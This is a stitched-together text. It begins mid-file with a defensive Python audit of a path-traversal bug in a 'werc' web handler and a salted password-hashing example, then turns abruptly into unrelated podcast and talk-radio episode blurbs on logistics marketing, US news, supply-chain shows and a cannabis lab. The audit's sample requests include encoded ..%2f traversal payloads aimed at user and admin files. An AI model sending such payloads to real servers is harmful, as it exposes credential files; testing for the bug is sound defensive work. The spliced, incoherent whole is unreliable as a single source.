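    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


# Constructed sample requests; the two plain ..%2f forms are the ones
# shown on this page, the rest are edge cases for the check.
SAMPLE_REQUESTS = [
    "/index.md",
    "/..%2f..%2f/etc/users/admin/members",
    "/..%2f..%2f..%2f..%2f..%2f..%2f/adm/users",
    "/apps/../index.md",
    "/..%2fcirno-private/notes.md",
    "/..%252f..%252fetc/users/admin/members",
]


def audit(requests, fs_root=FS_ROOT):
    """Return (request, unchecked_target, confined_target) for each request."""
    return [(r, resolve_unchecked(fs_root, r), resolve_confined(fs_root, r))
            for r in requests]


if __name__ == "__main__":
    for request, unchecked, confined in audit(SAMPLE_REQUESTS):
        print(f"{request!r}")
        print(f"  unchecked -> {unchecked}")
        print(f"  confined  -> {confined or 'REFUSED'}")
```

Running the same sample list through a handler after any change to its decoding or matching logic makes a regression of this kind visible immediately.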
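
For the password hashing section above, one shape the stored record could take, as an added Python example (not werc code): it uses salted PBKDF2-HMAC-SHA512 in place of a single unsalted digest, and treats a record that is not in the hashed format as a legacy plaintext entry to be upgraded after a successful login. The record format, function names and iteration count are assumptions.

```python
"""Salted password records with a plaintext-migration path (added example)."""
import hashlib
import hmac
import secrets

SCHEME = "pbkdf2-sha512"
ITERATIONS = 210_000  # assumption: a work factor to tune for the host


def hash_password(password, salt=None, iterations=ITERATIONS):
    """Return a self-describing record: scheme$iterations$salt$digest."""
    salt = secrets.token_bytes(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha512", password.encode(), salt, iterations)
    return f"{SCHEME}${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password, stored):
    """Return (ok, needs_upgrade) for a login attempt.

    needs_upgrade is True when the password matched but the record is a
    legacy plaintext entry or uses fewer iterations than the current setting,
    so the caller should rewrite it with hash_password().
    """
    stored = stored.rstrip("\n")
    parts = stored.split("$")
    if len(parts) == 4 and parts[0] == SCHEME:
        try:
            iterations = int(parts[1])
            salt = bytes.fromhex(parts[2])
            expected = bytes.fromhex(parts[3])
            digest = hashlib.pbkdf2_hmac(
                "sha512", password.encode(), salt, iterations)
        except (ValueError, OverflowError):
            # Malformed hashed record: fail closed, never fall back to
            # comparing it as plaintext.
            return (False, False)
        ok = hmac.compare_digest(digest, expected)
        return (ok, ok and iterations < ITERATIONS)
    # Legacy record: the file holds the password itself.
    ok = hmac.compare_digest(password.encode(), stored.encode())
    return (ok, ok)


if __name__ == "__main__":
    legacy = "supersecret\n"  # constructed sample of a plaintext record
    ok, upgrade = verify_password("supersecret", legacy)
    record = hash_password("supersecret") if ok and upgrade else legacy
    print(record)
    print(verify_password("supersecret", record))
    print(verify_password(record, record))  # the record is not a password
```

With hashed records, a file read through the traversal bug no longer yields a string that can be typed into the login form or tried against other services.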
Jim Bierfeldt and Joe Lynch discuss the logistics buyers survey. Jim is the Founder and President of Logistics Marketing Advisors, a full-service marketing agency exclusively focused on helping logistics businesses drive profitable growth. About Jim Bierfeldt Jim Bierfeldt is the Founder and President of Logistics Marketing Advisors. Jim has had a 35-year career in marketing and communications, including 25+ within the logistics industry. He ran marketing for a large 3PL before launching his own marketing agency, Logistics Marketing Advisors, which focuses exclusively on providing marketing strategy and services to logistics businesses. His expertise includes strategic planning, brand positioning, advertising, public relations, website strategy and design, and development of white papers, case studies and other content. Jim has worked with both smaller, regional logistics companies and multi-billion dollar global firms, all of whom benefit from his unique combination of marketing expertise and logistics industry knowledge. Jim holds a Masters Degree in Communications from Fordham University and has been active in CSCMP, WERC and the IWLA. His hobbies include running (including multiple marathons). About Logistics Marketing Advisors Logistics Marketing Advisors (LMA) is a full-service marketing agency exclusively focused on helping logistics businesses drive profitable growth. Our niche focus gives us the industry understanding and contacts required to market effectively to logistics decision makers. We're a HubSpot-certified, inbound marketing agency with the following specialties: branding and positioning strategy, lead generation, web design and development, content marketing, public relations, and creation of branded and educational content like videos, case studies, white papers and other sales support materials. LMA's approach recognizes that logistics services today are BOUGHT, not sold. 
Marketing tactics that interrupt and annoy busy logistics executives get ignored. These buyers now have access to a wealth of information and do their own research on how to solve supply chain problems, and what providers can do to help. At LMA, we help logistics businesses get found by prospects during this research phase. Instead of building a marketing engine to solicit, we build an engine that naturally attracts the best prospects. The best way to do that is with helpful, provocative content that leads prospects to conclude, for themselves, that your company has the best solution for their specific challenge. Key Takeaways: Logistics Buyers Survey Jim Bierfeldt is the President of Logistics Marketing Advisors, a full-service marketing agency exclusively focused on helping logistics businesses drive profitable growth. In the podcast interview, Jim shared some of the findings from the logistics buyers survey that his firm publishes every other year since 2014. Jim and his team have done the research to really understand what shippers want from their 3PL. The survey results are available for free within the “Marketing Logistics Services” download on The LMA website. Below are a few of the survey questions that LMA asked people who buy 3PL services: When it comes to choosing a logistics product or service provider, which statement best describes your attitude and priority? Which sources of information do you rely on to stay current on logistics management strategies, service providers, and logistics industry news? Think about the last time you proactively reached out to a logistics business (that was not a current supplier) to learn more or to discuss a project. What led you to reach out? How do you prefer to be contacted by a logistics business? The survey results along with expert insights are contained in an easy to read 19 page PDF report available on LMA's home page. 
The report is completely free, no obligation, they don't even ask for your contact information. Logistics Marketing Advisors designs and executes strategic marketing programs that help logistics businesses drive revenue and profit. LMA is a specialty agency focused on the logistics industry; this enables them to maintain the industry knowledge and contacts required to help their clients succeed.
WERC reporter Gwynne Mountz joins JT for an update on the World games
White House Correspondent Jon Decker discusses the chances that President Biden will run for re-election in 2024.
IHeart Radio National Correspondent Rory Oneill discusses the upcoming hearings from the January 6th Committee as well as whether the gas prices will continue declining.
Heritage Expert Virginia Allen talks about what local Texas leaders are saying as the border crisis keeps getting worse.
Jared Hudson, candidate for Jefferson County Sheriff discusses why he is the right fit for the Jefferson County Sheriff's Department.
Former US Attorney Jay Town discusses how new gun laws give more resources to gun stores and pawn shops as well as the "good time law" which put the man who shot Deputy Brad Johnson back on the street.
Cindy Collins, spokesperson for Operation Outcry, discusses how American women will be better off now that the Supreme Court has reversed Roe v. Wade.
Fox News Radio's Eben Brown has the latest on WNBA star Brittney Griner who is still being detained in Russia.
Founder and CEO of InVest USA, Michael Letts, talks about a Detroit Ice Cream Shop who refuses to serve uniformed police officers.
IHeart Radio National Correspondent Rory Oneill has the latest on the death of the former Japanese prime minister as well as WNBA star Brittney Griner entering a guilty plea in a Russian court.
Editor in Chief of the New York Analysis of Policy and Government, Frank Vernuccio, has the latest on the resignation of Boris Johnson.
Investment Advisor Ed D'Agostino talks about where you should be putting your money with a recession looming.
IHeart Radio National Correspondent Sara Lee Kessler has the latest on the July 4th shooting in Highland Park, IL
University of Texas at Arlington Political Science Professor Allan Saxe discusses Trump allies being subpoenaed by Fulton county DA in election probe.
Jonathan Strickland, host of the Tech Stuff podcast discusses a case where artificial intelligence didn't really work as intended.
Attorney Kirby Farris discusses the case of a former UAB football convicted of murder getting a new trial.
Lt. Steve Rogers discusses how Democrat leaders look the other way as crime skyrockets in major cities.
IHeart Radio National Correspondent Rory Oneill discusses Boris Johnson resigning amid many of his cabinet members leaving as well as discussing the looming recession and whether layoffs will follow.
IHeart Radio National Correspondent Rory Oneill discusses a new study that shows Americans are losing confidence in Congress and the Supreme Court while still supporting the military, police and small business.
President of the Take Back Action Fund, John Pudner, discusses how the political damage suffered by Donald Trump during the January 6th hearings could open the door for some new Republican Presidential hopefuls.
Jonathan Skinner from WBRC Fox 6 gives us the latest on the capture of the kidnapping suspect from Calhoun County.
Congressman Mo Brooks talks about receiving a subpoena from the January 6th committee and the conditions that he has before he will testify.
IHeart Radio National Correspondent Erin Real has the latest on the parade shooting in Highland Park, IL.
The Supply Chain Buzz is on for April 25, and this week, Scott and Greg are joined by 6 River Systems Vice President of Product & Analytics Gillan Hawkes to discuss automation's hopeful future for businesses big and small. Tune in to hear them talk positive disruption, how to plan for uncertainty, why risk must trump cost and more. Additional Links & Resources: Learn more about Supply Chain Now: https://supplychainnow.com/program/supply-chain-now Subscribe to Supply Chain Now and all other Supply Chain Now programs: https://supplychainnow.com/subscribe Learn more about 6RS upcoming WERC event: https://bit.ly/3EOG50d Leveraging Logistics and Supply Chain for Ukraine: https://vectorgl.com/stand-with-ukraine/ WEBINAR- How to Solve Three Common Peak Season Challenges: https://bit.ly/3r3Qxel WEBINAR- The 10 Best Competencies of Best in Class Warehouses: https://bit.ly/3vh3MLd 2022 Q1 U.S. Bank Freight Payment Index: https://bit.ly/3pwmWKC Check out the 2022 Supply Chain and Procurement Awards: https://supplychainprocurementawards.com/ This episode is hosted by Scott Luton and Greg White. For additional information, please visit our dedicated show page at: https://supplychainnow.com/supply-chain-buzz-6-river-systems-886
This month we are joined by Dr. Bob Novack, CSCR Director of Student Research and Outreach and Associate Professor of Supply Chain Management at the Penn State Smeal College of Business. During this episode, supply chain professionals will receive insights and tips about talent management from the perspective of a seasoned college professor interacting with top-tier talent daily. Dr. Novack and our hosts discuss what he's discovered regarding ways companies can stand out in a crowd, challenges in recruitment, and strategies for how to best connect with students. Dr. Novack is currently the CSCR Director of Student Research and Student Outreach and Associate Professor of Supply Chain Management at the Penn State Smeal College of Business. From 1979 to 1981, Novack worked in Operations and planning for the Yellow Freight Corporation in Overland Park, KS. From 1981 to 1984, Novack worked for the Drackett Company in Cincinnati, OH. He is the co-author of two textbooks: Transportation (with John Coyle and Ed Bardi), and Creating Logistics Value: Themes for the Future (with Lloyd Rinehart and John Langley). He has published numerous articles in the Journal of Business Logistics and the Transportation Journal, among others. Novack is a member of AST&L, CLM, and WERC.
Today we're talking to Doctor Jeffrey Raber of The Werc Shop, a lab working to develop formulations for better more consistent cannabis products. He's also an instructor with the Ganjier Program, and Executive Director of the Association of Commercial Cannabis Labs (ACCL). Patreon: https://www.patreon.com/bluegrasspodcast Instagram: https://www.instagram.combluegrass_podcast/ twitter: https://twitter.com/bluegrasscast
In this episode of the Supply Chain Buzz, Scott and Greg welcomed Rhonda Bompensa-Zimmerman and Demo Perez to the podcast to discuss the top news in Supply Chain this week. Rhonda Bompensa Zimmerman is an educator that is passionate about sharing behavioral strategies to help others find their way to living a more joyful and meaningful life. With decades serving as a Director of Fitness and Wellness at the collegiate level, she is excited to find her home now working in the transportation technology world at GlobalTranz. She is enjoying the opportunity to help her team, and other professionals in the industry, by sharing mind, body, and spirit positive health practices to aid them in their journey of personal and professional success. Demo Perez started his career in 1997 in the industry by chance when a relative asked him for help for just two weeks putting together an operation for FedEx Express at the Colon Free Zone, an area where he had never been but accepted the challenge. Worked in all roles possible from a truck driver to courier to a sales representative, helped the brand introduction, market share growth and recognition in the Colon Free Zone, at the end of 1999 had the chance to meet and have a chat with Fred Smith (FedEx CEO), joined another company in 2018 who took over the FedEx operations as Operations and sales manager, in 2004 accepted the challenge from his company to leave the FedEx operations and business to take over the operation and business of DHL Express, his major competitor and rival so couldn't say no, by changing completely its operation model in the Free Zone. In 2005 started his first entrepreneurial journey by quitting his job and joining two friends to start a Freight Forwarding company. After 8 months was recruited back by his company LSP with the General Manager role with the challenge of growing the company and make it fully capable warehousing 3PL. 
By 2009 joined CSCMP and WERC and started his journey of learning and growing his international network and high-level learning. In 2012 for the first time joined a local association (the Panama Maritime Chamber) and worked in the country's first Logistics Strategy plan, joined and led other associations ending as president of the Panama Logistics Council in 2017. By finishing his professional mission at LSP with a company that was 8 times the size it was when he accepted the role as GM with so many jobs generated and several young professionals coached, having great financial results, took the decision to move forward and start his own business from scratch by the end of 2019. With a friend and colleague co-founded IPL Group, a company that started as a boutique 3PL and now is gearing up for the post-Covid era by moving to the big leagues. Upcoming Events & Resources Mentioned in this Episode: Subscribe to Supply Chain Now and ALL Supply Chain Now Programming Here: https://supplychainnowradio.com/subscribe Leave a review for Supply Chain Now: https://ratethispodcast.com/supplychainnow Connect with Scott on LinkedIn: www.linkedin.com/in/scottwindonluton/ Connect with Greg on LinkedIn: www.linkedin.com/in/gswhite/ Connect with Demo on LinkedIn: https://www.linkedin.com/in/demostenes-perez-ba06212/ Connect with Rhonda on LinkedIn: https://www.linkedin.com/in/rhonda-bompensa-zimmerman-phd-138aa3b/ Supply Chain Now Ranked #3 Supply Chain YouTube Channel: https://tinyurl.com/yazfegov Download the Q3 2020 U.S. Bank Freight Payment Index: freight.usbank.com/?es=a229&a=20 Watch the Replay of The Connected IoT Supply Chain: https://supplychainnow.com/the-connected-iot-supply-chain Check Out News From Our Sponsors: U.S. Bank: www.usbpayment.com/transportation-solutions Capgemini: www.capgemini.com/us-en/ Vector Global Logistics: vectorgl.com/ Verusen: www.verusen.com/ This episode was hosted by Scott Luton and Greg White. 
For additional information, please visit our dedicated show page at:...